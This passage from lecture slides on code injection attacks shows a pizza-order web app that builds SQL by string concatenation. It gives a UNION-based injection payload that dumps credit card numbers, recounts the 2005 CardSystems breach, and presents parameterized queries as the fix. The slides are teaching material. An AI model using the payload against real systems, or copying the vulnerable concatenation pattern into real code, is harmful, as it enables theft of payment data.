  • 13. CS142 Lecture Notes - Code Injection Attacks Order history query to SQL database ● Order history request processing: var month = routeParam.month; var orders = Orders.find_by_sql( "SELECT pizza, toppings, quantity, date " + "FROM orders " + "WHERE user_id=" + user_id + "AND order_month= '" + month + "'"); ● Month parameter set to: October' AND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards WHERE name != '
  • 14. CS142 Lecture Notes - Code Injection Attacks SQL Injection - Dump the database SELECT pizza, toppings, quantity, date FROM orders WHERE user_id=94412 AND order_month='October' AND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards WHERE name != ''
  • 15. CS142 Lecture Notes - Code Injection Attacks Output the dump
  • 16. CS142 Lecture Notes - Code Injection Attacks CardSystems hit by SQL injection attack ● CardSystems - Credit card payment processing company SQL injection attack in June 2005 Did in the company ● The Attack: Credit card #s stored unencrypted 263,000 credit card #s stolen from database 43 million credit card #s exposed
  • 17. CS142 Lecture Notes - Code Injection Attacks Solutions ● Don't write SQL Student.findByAdvisorName(routeParam.advisorName); ● Use a framework that knows how to safely build sql commands: Student.find_by_sql("SELECT students.* " + "FROM students, advisors " + "WHERE student.advisor_id = advisor.id " + "AND advisor.name = ?", routeParam.advisorName);